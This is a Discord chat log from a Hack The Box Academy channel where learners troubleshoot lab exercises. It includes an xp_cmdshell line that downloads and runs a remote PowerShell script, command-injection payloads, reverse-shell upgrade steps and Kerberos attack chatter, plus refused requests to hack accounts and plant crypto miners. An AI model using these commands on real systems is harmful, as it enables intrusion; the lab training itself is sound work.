#modules

is there anyway ?

or hackthebox and tcm will be enough ?

Use #careers-and-certs

Did you read the hint?

got it but am not able to transfer the zip file generated from the windows host to the linux host as the linux host oes not have interneet to download the packages to do it the way i always do it

how do i hack a steam account? it not for evil purposes

in summery can you help with commands to move a file from windows host to inux host

Look at the "File transfers" module

Offtopic

Sure there bud

Read the #rules

i wanted to use upload server but the attacker machine does not have the package to run it and it does not have internet to download it

Actually...

You can do it without the bloodhound

i created two account with the same name and email and i cant log on my second account and there 50$ on my second acc

Hint and powerview would be enough

OK contact steam support

But actually you can make the zipfile with bloodhound-python on linux

aight

yeah it can be done via powerview buuuttt either the commands return nothing or tons of users

I will ask you again, did you read the hint?

There was a hint

why loop do need work with me?

for i in {1..4};do echo hi $i ;done

I run into this issue in in PASSWORD ATTACKS
Pass the Ticket (PtT) from Linux with impacket (i upgraded he package but no success there):

[proxychains] Strict chain ... 127.0.0.1:1080 ... ms01:445 ... OK
[-] ('unpack requires a buffer of 4 bytes', "When unpacking field 'length | !L=0 | b''[:4]'")

I changed to the exact version of the example and still get trouble 😢
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[proxychains] Strict chain ... 127.0.0.1:1080 ... dc01:445 ... OK
[-] invalid principal syntax

#welcome

Hello I need help on bug bounty write report. I do not understand the question

Can anyone help with AD attacks - Bleeding Edge? I have set up the share to work with the exploits but I get a File Not Found. Anyone able to lend a hand and look at my syntax?

guys i do not get solution for this upnormal questin

and when searching for the solution i found this

I tried this method in the "Automating payloads & Delivery with Metasploit" in "Shells & Payloads" and its not working. 😢 I search all across forums and old messages and this was the prefered method. What am I doing wrong? 🙏

؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

you should read the chapter with the if conditions again.

i read it but ok i will read it again

sorry i read it again and i did not get it

Think about what exactly needs to be met. Then write your If Statement

very off tooic

read #rules and #welcome

also @sterile hawk whats the rules on someone having a nazi flag in their pfp

They already left. Just came here to advertise their garbage game.

Removed the message, but yeah I'm going to say if they were still in the server we'd take action on that thanks 👀

funny part is Ive played that game already, Its okay at best.

Hello, i'm new to tech and all this stuff. just wondering, but how does a RCe attack work? what application would you have to need for it to process

RCE is just a generic term to classify stuff. Its not like a specific attack. Its a category

Hi, need help for module "Web Attacks - Skills Assessment".. Is it normal that the button "Submit" doesnt work?

Can you get RCE'D by playing a game?, for example if i was to play CSGO can i get RCE attacked by a random player?

maybe, that depends on if csgo has a vulnerability that enables RCE

RCE is just a possible goal of a vulnerability

well, quick little question i would like ot ask you

Is there anyway i can get RCE protection? i want to protect myself from future RCE attacks

You dont protect against RCE directly, its an end goal for some types of attacks. To defend yourself youd defend against various other stuff.

RCE is remote code execution, it just means that the attacker has managed to load code on your system. This can be as complicated as exploiting some vulnerability to it, to having your credentials from somewhere and just logging in as you, to tricking you to run their malware that gives them RCE

oh wow, yeah i actually didnt know this much about RCE

Is this similar to a rat?

a rat would be a type of tool employed to achieve RCE

Ahh okay

rat may be loaded by a different RCE vuln, or possibly by tricking you into running it, etc

Do you reccomend malwarebytes?, just in general

I tend to recommend it to my avg customers. But its def not the best or anything.

NVM i got it

but any AV is better than no AV

Do you know the game call of duty black ops?

yes

Yeah well, seems like that game has alot of vulnebilitys

Could be

simply by opening it you can get hacked appareantly

most software do

getting off topic here

"Hackers can EASILY severely infect your PC with malware, including Remote Administration Tools, which allow complete control over your system by a foreign party. This means the hacker can install malicious programs, execute malicious programs, have access to banking/financial info, have access to any other passwords, open browser windows, or even format your hard drive, wiping all data from the computer in the process."

thats what i saw in the steam reviews of the game

I cant believe this can also happen with call of duty

this channel is mainly for htb academy module discussion

not for discussing maybe cod vulns

ok sorry, just wanted to point that out

do you know what john the ripper is?

yes

What does it do?, i never really understanded it. Does it just crack passwords?

Its for cracking hashes yes

Can it be used illegally and legally?

ofc

What's it mainly used for?

cracking hashes

both the good guys and the bad guys regularly need to crack hashes

Have you ever used it before?

Yes

Did you use it legally?

Ive used it for both. I do not recommend committing crime though. Against server rules. I did it as a dumbass teenager ages ago

oh okay

but again, this chat is for module discussion. If you want to access the generic discussion channel you need to verify your account following the instructions in #welcome

Oh yeah, i forgot to do that

1 more question i would like to ask, Is there any good VPN that i can use that you reccomend?

cause this channel is for htb academy. which is HTB training materials and course stuff

I don't use VPNs except for lab stuff

oh alright

someone who completed cme module?

is it worth it?

id worry about it after completing CPTS

Yeah, this module is really cool

how do people make bitcoin miners and than put it onto someone elses computer?

ok maybe i was a little bit TOO SPECIFIC

Wrong Server

guys

out of topic

i was abit to specific

and wrong server

why wrong server?

this server for hacking, yes?

No

white hat

server for legal stuff

yes but i am doing legal stuff to

miner bitcoin in legal use

yea

deploying a malware in remote computers to mine cryptocurrencies

typically when people say bitcoin miner theyre referring to malware versions

This Channel is only about the modules of the HTB Academy

and even if you werent, theres no security benefit in regards to crypto mining

#hacker-lounge

when i say bitcoin mining, i'm not planning on stealing information or doing any of that kind of stuff

Either way, read #welcome abd verify your account

then wdym

youre off topic

ok

.

why is the verificiation system in this server so weird?

literally u said deploying a malware in someone elses computer

Even answering some of your basic questions was pushing the limits of offtopic discussion

because its a large server and given the nature of its content frequently targeted by dumbasses

in a legal USE, i'm not doing anything illegaly

simply just injecting malware into someone elses computer but not stealing theyr information

not all miners are malware

brother that is still incredibly illegal

what do you guys even do?

you guys make money?

or what

I know

can we not humor this anymore? lol

People here are either security professionals or aiming to be security professionals

pentesting/red team type stuff

ok fair enough

@fathom spade but this is the last one. verify your account

Ok

or were just gunna start pinging for offtopic

ty

I had thought doing cme, kerberos attacks and bh for AD before the exam

I wouldn't

In some ways, they might lead you astray, because the exam was built for the course.

good info, but likely to teach a bunch of stuff you wont see in the exam

The content of the modules from the path is enough for the exam, but additional knowledge is never wrong.

:/ I am still not confident to try the exam

I just want go when I am sure I will pass it

yeah but excess stuff outside if the course wont necessarily improve your odds

itll make you overall better sure

but in pure terms of passing the exam, it wouldnt be efficient

It's easier to jump into the water, than to go inch by inch.

I have been practicing with medium boxes after finishing dante and zephyr

for the fooothold

just remember: red teamers have failed this exam because theyve overthinked things

I have a mate doing the exam and he got the foothold in the day 4

k thanks

there is some advantages to being dummy mode haha

I am gonna remember this during exam

For anyone using Kali VMs. I feel like I used to be able to upgrade my reverse shells the standard way. Once a reverse shell is kicked back to me, assuming the box has python, I would do ```
python3 -c 'import pty;pty.spawn("/bin/bash")'

ctrl-z

stty raw -echo; fg
enter
enter
export TERM=xterm
```Lately that seems to results in something like this where I cannot get back to my session after typing the fg; enter enter Any help as to what I am doing wrong?

CTRL + Z
stty raw -echo; fg
reset xterm
export SHELL=bash
export TERM=xterm-256color
stty rows 38 columns 116
source /etc/skel/.bashrc```

u missing reset xterm

so after typing echo; fg, I should type reset xterm? is that before or after the enter enter following fg? and Thanks for the help!

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys#method-3-upgrading-from-netcat-with-magic

Thanks!

I sent it step by step

Thank you!

Anyone ever get this with Zap? I cannot figrue out what is causing it. I dont have any additional add-ins installed etiher.

is there a way to reset a module so it erases the answers?

Been thinking about this
Unfortunately there's none

I wish they would add it. Sometimes I want to re-do a module, but the answer is right there...I mean, yea i can just keep doing it without looking at the answer or until i find it..but its different

Can anyone enlighten me a little as to the differences between gobuster fuzz -w ./vhosts -H "HOST: FUZZ.domain.com" -u "http://10.129.179.60" and ffuf -w ./vhosts -H "HOST: FUZZ.domain.com" -u "http://10.129.179.60"? I'm not sure why I get different results 🤔 I imagine it has to do with how the url is handled?

It's just a difference in the tools

Fair enough I guess, I'm just surprised how drastically different the results are.

Specifically, gobuster gives me effectively nothing whereas ffuf is putting out exactly what I'd expect.

Gobuster has a vhost function - you don't have to manually do everything with fuzz.

But it's the same wordlist...

Actually, I can definitely see it has to do with how I'm passing the -u into gobuster - I guess it doesn't handle it the same way - though I'm not sure the correct way for managing that.

https://github.com/OJ/gobuster#examples-2

This is the vhost method.

"Difference in tools"

Which brings me to my second question, why am I not getting the expected results from gobuster vhost -w ./vhosts -u "http://domain.com" as I am with ffuf.

ffuf is just better

Care to elaborate on that difference? Both tools are designed to use a wordlist to search for differences in the response

Yeah, need to see the actual command and output you're running.

I assume he's just not using gobuster correctly

I dont use either enough to comment on what the differences are

Mind if I send a DM your way? Don't want to spoil modules here or anything 😅

This was my thought too, haha.

Yeah, well for this use case there should be no difference in results.

yeah, that's fine

It could be a difference in syntax

¯_(ツ)_/¯

Like you can absolutely use gobuster to run through a wordlist for vhosts

a "difference in tools" is that ffuf is probably faster, but the results should be the same because it's the same wordlist and both tools work

I would expect gobuster to be faster.

In vhosts mode it might be

gobuster vhost -u http://10.129.179.60 -w vhosts

should work

Same results 🤔 (as in, the same as before - not the same as ffuf )

Something weird is happening, do you have proxy setting pointing to burp suite or something?

Nope, just straight up running the cli tools against the given IP. No proxies or anything like that.

@wary plover can you friend me? i have to say something in dms

O_o

I REALLY HAVE TO

it works for me, albeit on a different target

i dont really know if I can sau those in here

you here?

Sure, but the results should be the same because they are being instructed to do the same thing

Happy to share screens in DM if you'd like 🤷

im on phone atm so cant, sorry

i dont use discord on my laptop cause its for work :p

Yeah, fair enough, rat is looking through it with me so 🤞 there's a solid explanation (probably that I'm dumb), haha.

ok but that's not helpful here because we're trying to figure out why gobuster isnt working..?

👍

Mystery solved. I needed --append-domain 🎉

(Without seeing my wordlist, it makes sense that this wasn't obvious)

Thanks to everyone who chatted through this with me 🙏

tldr: rtfm

@zinc thunder dm

What do you want

Most people aren't gonna blindly dm

And i swear if it's "I need help hacking an account/website"

just see what i dmd you

In b4 MarcieLee gets rickrolled.

No. Fuck off.

Ahh

gg

gg 🙂

Just read it

Please

I did, I'm telling you to fuck off

Be kind please

You have (allegedly) all the info to do it yourself

cant you say it without swearing? are you thinking that swearing makes you cool?? I havent done anything bad to you

Tell him to fuck off in dm

OH FUCK YOU

FUCK YOU

lol

Considering you're coming in here and blindly asking people

FUCK YOU

well that escalated more than xss -> rce

Is it possible sure.

cant you say it without swearing? are you thinking that swearing makes you cool?? I havent done anything bad to you

I've seen some xss -> rce in electron apps 😎

Still funny

he's got more issues than a HTB box

So curious what that dude was after.

he wanted someone to photoshop his girlfriends face on mia khalifa's body

TLDR reason I said it here was bc he was probably gonna keep trying

Nah even more lame, but it's off-topic for this chat

Really need all channels behind a verification filter.

Allegedly it's being worked on

For a full academy id rather than it being just behind the pay wall

I just installed the latest Parrot OS to do some Wfuzz work. Anyone getting this error about Pycurl

also this is the nicer me

Having trouble uploading images? Check #welcome for how to verify your main account and you'll be able to

The image is fine. The Wfuzz tool is not working right off the hop on the latest

I meant a picture of your error

Copy that

Thanks

This little gem, is my issue. Just started Broken Authentication now going to fix the tool, I guess. Quick google and this an old issue I thought.

Tried to start my pwnbox instance. It basically told me no dice, no available instances. So much for checking that out option out.

Ah

Try changing vpn region and launching the pwnbox

Also do sudo apt upgrade lol

I'm getting an "unable to connect" error on the Nessus Skills Assessment when inputting the IP into my browser.

Anyone else have similar issues?

Already did a reset and tried another IP, still no luck

https

Yeah, that's automatically in there in Mozilla.

I tried a new vpn file too

just now

https://[spawnedip]:[nessusport]

?

Not sure what that means

That's how you connect to nessus

On this assessment iirc

You have to use the ip:port

Just ip defaults to 443 for https

Which isn't open

I forget what port nessus runs on

Oh I see, I had to go back to the earlier modules to figure it out. So basically the IP they're providing is the IP to Nessus, not the IP of the "target"

Yes

To be fair it was explained earlier in the module, but the "target" part threw me off.

The targets are the ones from the section. Which they have prepopulated scans for you to use

Thanks for the help.

I believe it tells you to authenticate to it above the questions

But easy to miss

Yo

I need help hacking

Like real bad

hello can someone please help me with this question

https://academy.hackthebox.com/module/144/section/1256

i tried nslookup -type=any -query=AXFR inlanefreight.htb

Who knows how to hack a account

I need hel

Help

Real bad

and nslookup -type=any -query=AXFR nc.inlanefreight.htb

this is not the channel for that

What channel

Tell me the channep

we are not able to provide that kind of help

Oh

Ffs

.

.

I tried to do virtualHosting

and i tried dig AXFR ns.inlanefreight.htb @10.129.146.134

and dig AXFR inlanefreight.htb @10.129.146.134

without virtualHosting

but it did not work

my general advice is to watch ippsec's video on Fatty

the section is almost 1 to 1 rip from part of that box

yup

yes, those are completely different application types

but when I say its a rip I mean its literally the same jar file

oh youre still on the hardcoded creds part

nvm

that one just follow exactly step by step

not sure what the password is

or am I using the right command?

Hi, can't find a general academy channel, but I wanted to ask, I know there is a HTB SOC Analyst cert coming soon. Is it very soon? Or still a while away.

can someone give me a hint as to what the password maybe?

I know it's weak

I have issues to rdp to the target machine, what is the problem?

RDP to .... with user "Administrator" and password "AnotherC0mpl3xP4$$"

I tried with xfreerdp and rdesktop

make sure to put single quotes around the password, the $'s will get interpreted differently by the shell if you don't escape them

you win a beer today 😄 thx

I don't drink but o7

=S

highly recommend following along with the section on this, they show you exactly what you need to do

Bob's password is on the section page

Nessus Skills Assessment: What is the name of one of the accessible SMB shares from the authenticated Windows scan? (One word)

can't find anything in the scan

did the example scan because I didn't want to wait an hour

Look for smb in the scan search

It's there

It's all very general, checked multiple areas

You're probably overlooking something

I'm not able to double check for you though

Do I need to use anything besides Nessus?

Not that I remember

I kinda have a vague memory of this section because it was so boring

Oh that eternal exploit

Juicy

Found it, you just keep clicking and copy/pasting!!!

lol

You can see why I thought it was boring

Yeah, I agree

Nessus is low effort anyway

Like there's not much they can do to improve it anyways

Try that on OSCP, lol

Can't iirc its a banned tool

Yeah, haha, that's why I was jokin about it

I used to hate CLI tools when I started using Linux, now I hate anything with a GUI.

^ navigating imap with CLI

I still need work with IMAP

You were helping me with it a while back and things were not going well IIRC

Lol yeah

The fetch command they give you in the example suuuuucks

I've never used so many free, open-source resources to complete a paid service in my life, hahaha

Eh Google is the best assistant

And literally the links I found were what I used

Word!

PowerPoint

Access!

Slightly off topic for modules but a friend told me to ask on the HTB Starting Point channel my question about Vaccine box but I don’t seem to have access to that channel. Am I missing a role or something?

yes

read #welcome

Nessus Skills Assessment: What is the plugin ID of the highest criticality vulnerability for the Windows authenticated scan?

Tried the one that was rated 10

Did not work

Perfect, thank you!!

Tried the other one that is 9.1

Still no luck

Because that's score not the plug in id

Sir its the target

Like if you look at previous Nmap scans you've done

And compare it to the example output

It's easy to figure out

yeah I know I tried the ID # and it didnt work

It’s the server IP that you out there.

The --proxies proxyip flag can go anywhere in Nmap syntax yeah?

This does not work!

Tried 34460, #34460, and Plugin #34450

and I tried the mentoring service that HTB says they implemented

NO ANSWER!

Try a different service I think you're looking at the wrong one

I think they're frustrated that no answer they've tried is working

You're looking at the authenticated scan yes?

I'm looking at the scan provided.

There's multiple scans

:)

2 unauthenticated and 2 authenticated for windows/Linux

Iirc

I haven't actually done the exercises for that section yet because I didn't feel like it, but I feel like people have had issues with and/or complained about it because of a lack of rev experience. Could be wrong though

I like it though 🙃

I mean it's also the fact that it's thrown in out of nowhere (it was a recent~ish addition)

that is also very true

the opposite of a common application, quite frankly

Filter by Plugin ID worked

why is it giving me a different result and what dos it mean?

cd flag

Then do the get command

Examples aren't always 1:1 with the practice

Ls

Is it flag.txt

yes I'm a dumb dumb

get flag.txt

got it

Module: Tcpdump Fundamentals; Question: What TCPDump switch will increase the verbosity of our output? ( Include the - with the proper switch )
I have tried -v -vv -vvv and nothing seems to be working

Any ideas

Are you doing tcpdump -v or just -v

In the answer field

I tried both tcpdump -v and jsut plain -v

Try refreshing the page and trying again?

@fathom pendant from some reason just the -v is now working. HA!

Yeah sometimes it's dumb

thank you!

sudo apt upgrade does not fix it.

What software is it?

spoilers, delete

wfuzz via both the web base box and the latest issue both have this error. I am trying to fix my local copy. Any ideas?

likely just copy paste formatting issues

have you verified that this error actually prevents you from continuing

Yes

oh sorry but how can i ask that situation ?

like I said, its likely just an issue of copy pasting. make sure theres no spaces, extra chars, etc

example?

eh

its annoying that its in the course and just a rip. but thats it

i tried to many times, and i tried typing it @thorn urchin

too-

which module and section was it again?

https://academy.hackthebox.com/module/144/section/1256

thank you mad :C

the question is Find and submit the contents of the TXT record as the answer.

ah what you found wasnt the flag at all

idk what it is you founf

¯_(ツ)_/¯

unless they changed it but didnt remove my answer

i found by doing the command that is mentioned in the module can i send you my command ?

in dm

?

im settled into bed so I wont be able to load up the lab to verify

ok ok so in a nutshell is another command

thanks

Read the question again.

you have to assign this value to the variable salt

and what is differnt the value still equivelant

i am only here for a short time, but you can always write me a dm

The task is to assign the value to the variable salt
If you have done everything correctly, a flag comes out

Hi

nothing changed

Where is all the rest of the code?

this all of the code

No, there is code missing

he order encode var 28 time by base64
and i do it

You need all this code and then you have to put your loop in there.

but why i have base64 command can encode it

The code writes you the flag if you have done everything correctly

Hi! I’m on password attacks, credential hunting in linux module and I cannot find any valid credentials. Any help?

this my code after edit

I have tried hydra in any service with Kira account but nothing found, crackmapexec with smb and nothing

and give me bad decrypto error

I have found a valid credentials for Will user but I can only list smb shares with them

So not very useful

how?

please refrain from posting related spoilers from modules that are above tier 0

My image was a printscreen from the module. It does not contain any hints. 🤷🏻‍♂️

well, to be precise you are posting a content of tier 1 module, where people have invested their time and efforts into developing it

not to be published for free

I'm really grateful to you

but why my code removed?

#modules message

brother this is the channel for discussing and helping those very modules, that means sometimes including relevant snippets

but how i can sen the code to you?

its unreasonable to enforce it to the extent you currently are

well dude, if people keep going that route snippet by snippet you can build the whole section/modules

thats ridiculous

this channel cannot function like this.

where did this moderation guidelines come from?

ToS

no, where did this moderation guideline come from?

Who do I need to ask about this?

Please, do not continue to argue

No, Im intending to report a complaint about this, and I would like to know where I need to direct it.

Feel free to whomever you want 🙂

Really?

Will do then, time to send some DMs and emails.

Up to you

who give you the right to do this rule

Just to note, noone stops you from discussing modules/section, where you can re-phrase or point to specific question

how i can discuss with out send snippet

this is literally the first time Ive ever seen moderatorship take this stance in the channel

Guys, if you are going to using that ridiculous route that eathebuffet is going, there is not point into discussing more

You can always ask for someone to help you via DM, where you won't spoil the exercise publicly

ok

How can I made a complaint?

I already messaged some people. Told will be handled in the morning 👍

MY Hero

Ive noticed he does that often

@autumn pilot so i can not made write ups about module?

https://help.hackthebox.com/en/articles/5188925-streaming-writeups-walkthrough-guidelines

ok although but it is not rule do not allow share snippset in the discord

+i see in forums alot of people share snipsset

I run into this issue in in PASSWORD ATTACKS
Pass the Ticket (PtT) from Linux with IMPACKET (i upgraded he package but no success there):

[proxychains] Strict chain ... 127.0.0.1:1080 ... ms01:445 ... OK
[-] ('unpack requires a buffer of 4 bytes', "When unpacking field 'length | !L=0 | b''[:4]'")

I changed to the exact version of the example and still get trouble 😢
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[proxychains] Strict chain ... 127.0.0.1:1080 ... dc01:445 ... OK
[-] invalid principal syntax

Can anybody help please? 🫶

feel free to report them

really i need to report you

chill out, dont antagonize

his actions made me angry

and he could very well just be doing his job. Thats why I asked who to complain about it to. Its being handled one way or the other, so theres no use in arguing or prodding. Just makes it more likely you get the boot regardless.

ok i will wait and see

In that case, i would suggest only to include owned modules in the HTB academy search bar. Because it is actually an avenue for module content enumeration

hmm you could send requests to the search for every word in the dictionary and then piece the search result previews together

No screenshots/codeblocks that way.

In the Shells & payloads module, there is an example bind shell that specifies target IP. Why is that even needed? I never used it in previous modules and all my notes only include a port, which would be expected with a bind shell. https://academy.hackthebox.com/module/115/section/1105#:~:text=the TCP session-,No. 1%3A Server - Binding a Bash shell to the TCP session,-Target%40server%3A

that actually sounds like a funny mini project.

if searching for a word pulls up the previews, you could scan for the end of the preview to move the sliding preview window down and collect more information.

big brain time

🤓

make sure to gib credit when you write your blogpost that becomes the next big thing on the internet

can you help please, i am still stuck 😅

did you get to login into the mssql database?

one sec i'll check my notes

yes i did, and its empty

only default databases

did you think about command execution?

you should look into that.

yes i did, and i cant det to the desktop because no permissions

did you try another way?

and i tried having a revshell but same

well, this is what I did

did u try priv esc?

do i have to take the priv esc module?

enumerate the user u landed in, there should be a trait that will enable u to priv esc.

no, no need for priv esc module, there is a priv esc technique within the AD module.

check the user u landed in, enumerate the traits, and check the stacking the deck section :)

ok friends, thanks a lot, i will try that 🥰

no probs

Hii

guys quick question, did HTB remove the feature where u could extend the life of the exercises machine?

No

It just is only on certain execises I think

guys whats wrong here, i dont see the problem

Hello I have a question regarding the subscription. I have student subscription with access to all modules until Tier2. When I upgrade to Platinum, will i have my student access to all Tier2 Modules + each month 1000 Cubes? Thank you in advance

no

just 1000 cubes a month

complete all the tier 2 before

thank you for the info

You could try with:
xp_cmdshell 'powershell "IEX(New-Object Net.WebClient).downloadString(\"http://MACHINE-IP:PORT/FILENAME.ps1\")"'
I have taken another way though, so the above it may not work

i managed to do it through smb, but i will try this

can i dm you please? 😊

sure

I have a question that how I can become a HTB ambassador ?

Hello, in Miscilanious for Active Directory module, the question

Find another user with the "Do not require Kerberos pre-authentication setting" enabled. Perform an ASREPRoasting attack against this user, crack the hash, and submit their cleartext password as your answer.

I found the cleartext password but it's not accepting my answer, can anyone confirm with me if i'm doing the right thing its for asreproasting the ||mmorgan|| user

it's another user than the one mentioned

@fiery berry Thanks, I found it, needed to use ||best64|| rule

This question in the command injection module is driving me insane:
Use what you learned in this section to execute the command 'ls -la'. What is the size of the 'index.php' file?
I've tried every possible combination of bypasses already and nothing seems to work.

Use the example from Using $IFS and just replace the IFS with the command.

123.123.123.123%0a${ls -la} this doesn't work. Neither does this: 123.123.123.123%0a${ls,-la}

What does this output mean and how can I fix this? ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r1-.129.190.178 -R22
[sudo] password for ubuntu:
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.36' not found (required by ./ptunnel-ng) ./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./ptunnel-ng)

Should work. Just replace with 127.0.0.1

Doesn't work

Same result

Also I dont think that a different ip will change anything except for response time since it's pinging itself

Would change the time to resolve.

Yeah that's what I'm saying

are you sendingit in ip=

yes

try without the $

oh, lol

Wood for the trees 😄

Thats strange because it worked

Thanks a lot

cause of this

I was sure that I have already tried that

Cause of what?

cause that's not how you use ${ls,-l}

Yeah that's what I also thought, I was trying it cause wolfiej told me to give it a go.

He probably didn't mean to do it in that way, just a small mistake I guess

Yeah, thanks again

Yeah, I'm on a team meeting, so slightly distracted 😄

Hello everyone, looking for new Pentester friends to make here I am a Cyber Major on my pentest path, I would like to learn and share some of my experiences with some of ya

you can share here as well its good for all of us

Hey guys. I'm on Meterpreter Tunneling & Port Forwarding: Which of the routes that AutoRoute adds allows 172.16.5.19 to be reachable from the attack host? (Format: x.x.x.x/x.x.x.x) So far when I run the executable that I made with msfvenom it connects back to my multi/handler only for a split second and closes out immediately. msf6 exploit(multi/handler) > run

[] Started reverse TCP handler on 0.0.0.0:8080
[] 10.129.222.140 - Command shell session 1 closed.
[] 10.129.222.140 - Command shell session 2 closed.
[] 10.129.222.140 - Command shell session 3 closed.
[*] 10.129.222.140 - Command shell session 4 closed.
and on the ubuntu pivot host I get: ubuntu@WEB01:~$ ./backupjob2
Segmentation fault (core dumped)

The answer is given before you start any sessions

I suggest following this section to a T

Like exactly to a T

ok thank you for the advice

can someone help me on the shells and payloads as I cant work this out for the of me. Its asking for the location of the aspx on the pwn box. and I have entered every possible combination it wants, with file name, different folders that have the same folder and none work

You're connected to the pwnbox yes? Use the locate command or find command

yes i have the files, just none of the inputs are working

just got it

lol i feel dumb

It's the laudanum section yeah?

thx again

yep,

Start at /usr/share/

yep, im literally sat in the folder where they are located and copying pwd and its not accepting it

You need to include the /shell.extension

If all else fails, refresh page and put it in again

right theres 2 locations for the file and the hint points you to the wrong one...

Dm me

tells you to look in the /webshells folder where this is the file again

That's close

I have it now

i was in the correct one but didnt add the shell.aspx extension so looked at the hint and it takes you to the wrong folder

thanks

The hint isn't incorrect

It's to start you in the right direction unless it's saying there's a /webshells off of root

And not /path/to/webshells

still confusing how its installed in 2 locations on the machines

oh well, cheers tho

Probably symlinked

You don't need to Crack the key, the intended way is a cache file

Hint: the daemon of the realm shows you the way

It has to connect to Kerberos as the device yeah? Why would it not store those in its own files

Hi guys! If anyone has done Working with IDS/IPS module, can you please DM me?

with which section do you need help

I am struggling with Suricata fundamentals section

feel free to dm

hey, what's up? I'm taking the Password Attacks module and struggling with the question on Credential Hunting in Linux, did anyone here completed it?

Try re-using the query they provide as an example, but change the event_type to something else.

yo

Mistag?

I wanted ask u a thing

is it worth it doing the powerview module?

the one which costs 1000 cubes

Cost wise, probably not. I think it would be better priced at 500. But as a module I thought it was a decent module building on AD Enumeration.

okay thanks

Hi, for "Documentation & Reporting Practice Lab" do I have to do further enumeration and exploitation to gain access to DC01? and I cant login to WhiteHat app, tried the given credentials. I also need to do further enumeration for this? Thanks...

here what is the @@ .... @@ for?

https://stackoverflow.com/questions/10950412/what-does-1-1-mean-in-gits-diff-output

can I dm u?

I know nothing. Just found the link 😄

oh okay ty

Sorry!

then what happend now ?

Attacking Common Services - Easy... I'm so close. Is RDP utilized at all?

Is rdp open?

Indeed it is

Then it's probably utilized

My notes don't reflect utilizing it tho

The first step was smtp

Haha hmm okay thanks. I'm still looking for how to trigger the php shell

Ahh check you
1: used the correct slash direction
2: are in the right web directory:)

😅 Thanks 🙂 I'm thinking I missed a directory

Web roots are fun

So why'd you set it to 'PORT'

Lost here too son

It is, in the example

Still working on it, I'll lyk if I can't rig it up

'PORT' can be any one of the 65535 ports

It's based on the attack

There are some default values

Hi

Port is just whatever port the service happens to be running on

Infact it was to say that I need the most powerful cheat of codm I am ready to pay to have it who are interested tell me I pay first

If who is interested let me know

Kindly read the #rules

sorry

Am I doing something wrong with Attacking Thick Clients, can't run monta.ps1 and it throws an error running with -ep bypass in cml, therefore can't create "service.exe" to inspect

You can just fuck all the way off <@&861185840277487616>

chill im just tryna get my shit back

read the rules

i ddint mention hack or anything

Please explain how we would help without hacking

If it's banned then chat with Snapchat support

explaining to me what can i do

Like it's that simple

If they banned it for a legit reason, you're not getting it back

idk maybe someone has a differnet way

I am someone else btw

Nope support is the way.

they didnt their ai banned me cus i posted a non psychedelic mushroom 😭

shit sucks

Then chat with their support dude

i did they also dont have a actual human support

just ais who arealdy fucked me

this is off-topic. take it to their support.

^

Sorry I'm dragging this out more

party poopers

¯_(ツ)_/¯

"It's me, I'm the friend that wants to know"

https://academy.hackthebox.com/module/116/section/1165 I found a user and pass but it wasn't the right anwser. on the ftp there is another user and they were correct. I tried to bruteforce their passwd with the pw.list but got nothing. I can't edit passwd on ftp. Am i supposed to find another way to get their password?

Hello i am stucked in Pass the Ticket (PtT) from Linux , i don't know what is going wrong
at this question Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).
Can you help me

I did you try rockyou?

... No, I figured it would be in the file they gave us. thanks I'll try that

What have you tried

thank you for you quick response
i found the path of the cache of linux1 with linikatz and i export it in KRB5CCNAME
after that i try to get acces with smbclient

Are you sure it's the right one

There is a directory that the daemon uses

i found only one ticket cache for LINUX1$ with Linikatz

I have a general question regarding tunneling with chisel and co. I’m on a box that has a website hosted locally and I expose it via chisel and use proxy chains with Firefox to access the website. Now the website itself includes some bootstrap JavaScript libraries from the open internet. The box doesn’t have internet access and when I use proxychains on Firefox neither does Firefox. Now the website is stuck trying to access those js files and I can’t really browse it. Is there a solution to this?

Look manually

ok i try to do that

Not related to an academy module, ask in #web or #1024429874246590575

hydra estimates it'll take 700hrs

Is this the right way to get it?

^

I'm at 64 threads, I tried the pws.list file that came with it(I didn't mutate it) now doing rockyou.txt

I think the password should be in pws.list

I'll have to spin my box up

okay I'll reset, first time I ran nmap there was no FTP and I had to reset

Also running too many ftp threads can have it falsely skip the correct answer

oh didn't know that

didn't get it again, I'll try again without specifying thread amount

Wait

There's a rabbit hole here

Have you tried logging into ftp anonymously first 😄

oh god

ty

no login failed

There's a special file here that's helpful 😉

Really login failed?

user error I got the files ty

Rest is easy

Hey! I'm doing Linux Privilege Escalation, Containers section and the command it gives to run "lxc exec privesc /bin/bash" just gives "Error: Command not found"

Is there any section that teaches you how to use docerfiles?

Yeah

The user isn't in the docker group though

Hello. I'm a bit stuck on this one : https://academy.hackthebox.com/module/19/section/108
I did this scan : sudo nmap ... -p 80 -sV --script vuln
Got result but can't find FLAG
Can someone give me a tips please ? Thx

Try a different shell, bash might not be installed

I checked and it is

To clarify, the image they have you import in the section is Alpine Linux, which does not, by default, come with bash

The lxc exec privesc /bin/bash is running bash from within the container, not on your host

Oh, duh, yeah sorry

no worries, everyone has made this mistake at least once when working with that distro

hey anyone has done Attacking DNS at Attacking Common Services?

On Module Pivoting, Tunneling, And Port Forwarding. Section ICMP Tunneling with SOCKS when I try to start the ptunnel on the foothold machine I get the following error. I have a good feeling creating a docker image and compiling ptunnel that way for Ubuntu may fix the problem but this is out of scope for this module and I have never did this before. Is there something I'm missing that's in scope to fix this issue. Also if out of scope how did you solve this issue?
ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r1-.129.190.178 -R22
[sudo] password for ubuntu:
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.36' not found (required by ./ptunnel-ng)
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34' not found (required by ./ptunnel-ng)

https://academy.hackthebox.com/module/116/section/1512

i

I am stuck on this module for about an age

Is there a command to find the shell inside the container? I've tried a few. I tried "lxc-info -n privesc | grep '^Shell'" and that didn't work.

If you were exploiting this in the wild, you would be uploading your own image, so you would probably know already

I'm not too familiar with lxc specifically outside of the privesc, so I would have to do some labbing to figure that out

#858470491676737536 message

OK, thanks anyway. Just weird they put it in the module and didn't give a hint.

The intent was probably to make you not always use /bin/bash and be cognizant of what image you're using

